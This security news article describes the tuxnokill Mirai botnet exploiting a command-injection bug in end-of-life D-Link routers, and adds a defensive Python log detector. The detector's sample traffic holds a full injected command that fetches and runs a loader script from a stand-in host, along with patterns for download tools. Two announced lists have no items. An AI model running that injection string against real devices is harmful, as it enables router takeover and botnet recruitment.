
Mirai Botnet Variant 'tuxnokill' Actively Exploiting Critical RCE Bug in End-of-Life D-Link Routers

April 23, 2026 00:02

Active Exploitation of a Long-Known D-Link Vulnerability

A new botnet campaign built on the notorious Mirai malware framework is actively targeting D-Link DIR-823X routers by weaponizing CVE-2025-29635, a high-severity command-injection vulnerability. Researchers at Akamai's Security Intelligence and Response Team (SIRT) detected the campaign in early March 2026, marking the first confirmed instance of in-the-wild exploitation of this particular flaw.

The timeline is what makes this notable: the vulnerability, reported by security researchers Wang Jinshuai and Zhao Jiangting, had been public for roughly 13 months before the campaign was detected, and no in-the-wild exploitation had been observed in that window until now.

How CVE-2025-29635 Works

The vulnerability resides in firmware versions 240126 and 24082 of the D-Link DIR-823X series. According to Akamai's report, the flaw allows an authenticated attacker to execute arbitrary commands on a remote device by sending a crafted HTTP POST request to a specific endpoint.

"This vulnerability exists in D-Link DIR-823X series routers in firmware versions 240126 and 24082, and allows an authorized attacker to execute arbitrary commands on remote devices by sending a POST request to the /goform/set_prohibiting endpoint via the corresponding function, which can trigger remote command execution."

In practice, exploiting CVE-2025-29635 comes down to sending a crafted POST request to that endpoint, a low barrier for even modestly skilled threat actors once the endpoint and its parameters are known. One caveat: the advisory describes an authorized attacker, so the crafted request still has to be accepted by the router as authenticated; the report does not say how the attackers clear that hurdle.

A Brief Proof-of-Concept and Its Aftermath

Shortly after the vulnerability was disclosed, the researchers who discovered it published a proof-of-concept (PoC) exploit on GitHub. The PoC was later retracted, but its brief availability may have provided enough technical detail for threat actors to develop their own working exploits. Akamai's honeypot infrastructure subsequently captured the attack traffic that confirmed active exploitation was underway.

Attack Chain: From POST Request to Botnet Enrollment

The observed attacks follow a consistent sequence. The command injected through the POST request does the following on the target router:

  1. Change directory into one of several writable filesystem paths on the device.
  2. Download a shell script named dlink.sh from an external IP address under the attacker's control.
  3. Execute the downloaded script to complete the infection.

Once the script runs, it installs a Mirai-based malware strain that Akamai tracks as tuxnokill. The malware is compiled for multiple CPU architectures, which broadens the range of devices it can infect.
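The endpoint-plus-loader pattern described in the two sections above (a POST to /goform/set_prohibiting carrying a command that changes into a writable directory, fetches dlink.sh and runs it) is straightforward to flag in honeypot or proxy logs. The following detector is an added example written for this article; it is not Akamai's, D-Link's or BleepingComputer's code. It assumes a form-encoded POST body, a list of writable directories and fetch tools typical of Mirai loaders (not taken from the article), placeholder field names because the page does not name the real parameter, and constructed sample traffic using RFC 5737 documentation addresses.

```python
"""Flag HTTP requests matching the CVE-2025-29635 exploitation pattern: a POST
to /goform/set_prohibiting whose form values carry a shell command that changes
into a writable directory, fetches a loader script and executes it.

Added example for this article; not Akamai's, D-Link's or the article's code.
The form field the exploit abuses is not named on the page, so matching is on
the endpoint plus injection indicators in any field value, not on a field name.
"""
import re
from urllib.parse import parse_qsl

# Endpoint named in the D-Link advisory quoted in the article.
TARGET_ENDPOINT = "/goform/set_prohibiting"

# Assumptions, not from the article: directories Mirai loaders commonly try
# because they are writable on embedded Linux, and the fetch tools they use.
WRITABLE_DIRS = {"/tmp", "/var/run", "/mnt", "/root", "/dev/shm", "/var/tmp"}
FETCH_TOOLS = ("wget", "curl", "tftp", "ftpget")

SHELL_META = re.compile(r"[;|`]|\$\(")        # separators that start an injected command
CD_RE = re.compile(r"\bcd\s+(/[\w./-]*)")     # 'cd /tmp', 'cd /var/run', ...
FETCH_RE = re.compile(r"\b(?:%s)\b" % "|".join(FETCH_TOOLS))
URL_RE = re.compile(r"(?:https?|tftp|ftp)://([\w.\-]+(?::\d+)?)(?:/[^\s;|&]*)?")
SCRIPT_RE = re.compile(r"\b[\w-]+\.sh\b")     # e.g. the dlink.sh loader Akamai reported


def decoded_values(body: str) -> str:
    """Decode a form-encoded POST body and join its field values for scanning.

    Decoding per field (rather than the raw body) means the '&' separators
    between legitimate fields are never mistaken for a shell '&'.
    """
    return " ".join(value for _, value in parse_qsl(body, keep_blank_values=True))


def analyze_request(method: str, path: str, body: str) -> dict:
    """Classify one request.

    verdict is one of:
      "not_target"      - not a POST to the vulnerable endpoint
      "endpoint_only"   - the endpoint, with at most one weak indicator
      "exploit_attempt" - the endpoint plus two or more injection indicators
    """
    result = {"verdict": "not_target", "findings": [],
              "download_hosts": [], "scripts": []}
    if method.upper() != "POST" or path.split("?", 1)[0] != TARGET_ENDPOINT:
        return result

    text = decoded_values(body)
    if SHELL_META.search(text):
        result["findings"].append("shell metacharacters in a field value")
    if any(d.rstrip("/") in WRITABLE_DIRS for d in CD_RE.findall(text)):
        result["findings"].append("cd into writable dirs")
    if FETCH_RE.search(text):
        result["findings"].append("download tool invoked")
    result["download_hosts"] = sorted({m.group(1) for m in URL_RE.finditer(text)})
    result["scripts"] = sorted(set(SCRIPT_RE.findall(text)))
    if result["download_hosts"] or result["scripts"]:
        result["findings"].append("remote script fetched or executed")

    # A lone metacharacter can occur in odd but legitimate input; require a
    # second indicator before calling the request an exploit attempt.
    result["verdict"] = "exploit_attempt" if len(result["findings"]) >= 2 else "endpoint_only"
    return result


def scan(requests):
    """Return (client, analysis) for every request judged an exploit attempt."""
    hits = []
    for client, method, path, body in requests:
        analysis = analyze_request(method, path, body)
        if analysis["verdict"] == "exploit_attempt":
            hits.append((client, analysis))
    return hits


# Constructed sample capture: (client IP, method, path, raw POST body). Not real
# attacker traffic: addresses are RFC 5737 documentation ranges, and 'param',
# 'field1', 'field2' are placeholder field names, since the page does not give
# the real ones. The first body decodes to:
#   x;cd /tmp || cd /var/run || cd /mnt;wget http://192.0.2.10/dlink.sh;chmod +x dlink.sh;sh dlink.sh
SAMPLE_REQUESTS = [
    ("198.51.100.7", "POST", "/goform/set_prohibiting",
     "param=x%3Bcd+%2Ftmp+%7C%7C+cd+%2Fvar%2Frun+%7C%7C+cd+%2Fmnt%3Bwget+http%3A%2F%2F192.0.2.10"
     "%2Fdlink.sh%3Bchmod+%2Bx+dlink.sh%3Bsh+dlink.sh"),
    ("192.168.1.23", "POST", "/goform/set_prohibiting", "field1=abc&field2=1"),  # ordinary admin use
    ("192.168.1.23", "GET", "/goform/set_prohibiting", ""),
    ("198.51.100.9", "POST", "/goform/login", "field1=abc"),
]

if __name__ == "__main__":
    for client, analysis in scan(SAMPLE_REQUESTS):
        print(client, analysis["verdict"], analysis["findings"],
              analysis["download_hosts"], analysis["scripts"])
```

The extracted download host and script name are the two indicators worth pivoting on: the host is the attacker-controlled staging server for dlink.sh, and any other request in the same capture that fetches from it (including the TP-Link and ZTE exploits the same actor uses) belongs to the same campaign. Requiring two indicators keeps ordinary admin use of the endpoint out of the alert stream.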

Capabilities of the tuxnokill Malware

As its Mirai lineage suggests, tuxnokill is primarily designed to conduct distributed denial-of-service (DDoS) attacks. Its documented attack methods include:

These capabilities allow the botnet to conduct volumetric and application-layer attacks, making compromised routers useful tools for disrupting online services.

The Same Actor Is Targeting TP-Link and ZTE Devices

Akamai's investigation revealed that the threat actor behind the tuxnokill campaign is not limiting their efforts to D-Link hardware alone. The same attacker has been observed exploiting CVE-2023-1389, a vulnerability affecting TP-Link routers, as well as a separate remote code execution flaw in ZTE ZXV10 H108L routers.

In all three cases, the attack pattern was essentially identical, culminating in the deployment of a Mirai-based payload. This consistent methodology suggests a single, organized threat actor operating a coordinated multi-platform botnet recruitment campaign.

End-of-Life Status Eliminates Hope for an Official Patch

The D-Link DIR-823X routers affected by CVE-2025-29635 reached end of life (EoL) in November 2024. Under D-Link's standard policy, the company does not issue security patches for EoL products — and critically, the vendor has made clear it does not create exceptions even when active exploitation of a vulnerability is underway. This means owners of these routers should not expect an official fix.

BleepingComputer reached out to D-Link for comment on the reported exploitation activity and the status of any potential remediation, and indicated it would update coverage upon receiving a response.

What Affected Router Owners Should Do

Given the absence of a forthcoming patch and the confirmed active exploitation, users still running D-Link DIR-823X routers or other EoL devices are strongly encouraged to take the following steps:

The tuxnokill campaign is a stark reminder that end-of-life network devices do not simply become less useful — they become liabilities. With a proof-of-concept having been briefly public and a coordinated threat actor already incorporating multiple router exploits into a single campaign, the window for complacency has firmly closed for DIR-823X owners.


Source: BleepingComputer
